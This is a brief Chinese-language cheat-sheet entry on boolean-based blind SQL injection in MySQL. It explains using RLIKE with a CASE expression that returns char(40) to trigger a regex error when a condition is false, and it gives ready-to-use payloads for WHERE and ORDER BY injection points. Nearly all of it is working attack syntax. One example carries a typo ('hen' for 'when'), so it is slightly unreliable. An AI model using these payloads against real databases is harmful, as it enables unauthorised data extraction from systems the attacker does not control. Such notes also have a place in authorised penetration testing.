0x00 概要

有的时候,你发现注入了
但是因为这个注入点的数据表没有数据 / 前面加了where条件导致返回的数据为空
但是又不能延时的时候可以使用该方法进行布尔注入

0x01 语法

  1. // 正确的时候,界面无变化
  2. select * from tttt where type=11 rlike (case when 1 like 1 then 1 else char(40) end)
  3. // 错误的时候,界面会爆错/变的不同起来
  4. select * from tttt where type=11 rlike (case hen 1 like 2 then 1 else char(40) end)
  1. // 排序注入这样使用
  2. select * from tttt ORDER BY 1-1 rlike (case when 1 like 1 then 1 else char(40) end)